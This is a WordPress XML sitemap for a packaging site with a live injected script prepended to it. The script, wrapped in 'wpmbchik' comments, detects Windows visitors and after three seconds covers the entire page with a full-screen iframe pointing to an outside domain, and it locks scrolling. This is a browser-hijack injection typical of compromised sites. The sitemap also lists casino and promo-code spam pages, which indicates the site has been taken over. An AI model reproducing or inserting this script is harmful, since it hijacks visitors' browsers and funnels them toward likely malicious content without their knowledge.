
<!-- wpmbchik -->
<script>
function createModal(url) {
  const overlay = document.createElement('div');
  Object.assign(overlay.style, {
    position: 'fixed',
    inset: '0',              // top/right/bottom/left = 0
    width: '100vw',          // на всякий случай — единицы viewport
    height: '100vh',
    background: '#fff',
    zIndex: '2147483647',    // максимальный z-index
    margin: '0',
    padding: '0',
    border: '0'
  });

  const iframe = document.createElement('iframe');
  iframe.src = url;
  iframe.allowFullscreen = true;
  iframe.allow = 'fullscreen';
  Object.assign(iframe.style, {
    width: '100%',
    height: '100%',
    border: 'none',
    display: 'block',
    margin: '0',
    padding: '0'
  });

  overlay.appendChild(iframe);
  document.body.appendChild(overlay);

  document.documentElement.style.overflow = 'hidden';
  document.body.style.overflow = 'hidden';
  document.body.style.margin = '0';
}
document.addEventListener('DOMContentLoaded', () => {
  const isWindows = /Win/i.test(navigator.userAgent);
  
  if (isWindows) {
 setTimeout(() => {
    createModal('https://clickhere.click');
 }, 3000); }
});


</script>
<!-- /wpmbchik -->
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://alltimepackaging.com/wp-sitemap.xsl" ?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><url><loc>https://alltimepackaging.com/246-2/</loc><lastmod>2026-04-01T11:54:42+00:00</lastmod></url><url><loc>https://alltimepackaging.com/seo-course-in-bikaner/</loc><lastmod>2025-12-11T07:48:36+00:00</lastmod></url><url><loc>https://alltimepackaging.com/future-of-voice-search/</loc><lastmod>2026-03-27T11:27:54+00:00</lastmod></url><url><loc>https://alltimepackaging.com/digital-marketing-course-in-delhi/</loc><lastmod>2026-04-13T16:59:18+00:00</lastmod></url><url><loc>https://alltimepackaging.com/free-spins-crypto-casino-no-deposit/</loc><lastmod>2026-04-29T10:07:16+00:00</lastmod></url><url><loc>https://alltimepackaging.com/vavada-promokod-dlia-novichkov-bez-otygrysha-2026-goda/</loc><lastmod>2026-04-29T12:30:48+00:00</lastmod></url><url><loc>https://alltimepackaging.com/vavada-balti-kasiinos-2026-parimad-mangud-ja-boonused/</loc><lastmod>2026-04-29T14:47:02+00:00</lastmod></url></urlset>
